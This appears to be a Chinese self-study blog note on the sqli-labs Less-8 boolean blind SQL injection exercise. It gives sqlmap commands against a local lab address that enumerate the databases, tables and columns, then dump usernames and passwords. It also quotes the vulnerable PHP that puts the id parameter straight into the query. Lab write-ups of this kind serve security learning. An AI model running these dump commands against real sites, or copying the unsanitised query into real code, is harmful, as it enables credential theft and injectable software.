目錄
類型
布爾盲注-單引號
猜測出sql語句
SELECT * FROM users where id = '參數' LIMIT 0,1
-dbs枚舉數據庫
使用-o參數優化,--batch參數進行跳過
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-8/?id=1" -o -dbs --batch
比較慢,一個字母一個字母的顯示
--tables枚舉數據庫表
添加--dbms參數,--technique參數
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-8/?id=1"--dbms mysql --technique B -o -D security --tables --batch
--columns枚舉列
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-8/?id=1"--dbms mysql --technique B -o -D security -T users --columns --batch
--dump枚舉數據
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-8/?id=1"--dbms mysql --technique B -o -D security -T users -C username,password --dump --batch
查看源代碼
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
更多內容查看:網絡安全-自學筆記
有問題請下方評論,轉載請註明出處,並附有原文鏈接,謝謝!如有侵權,請及時聯繫。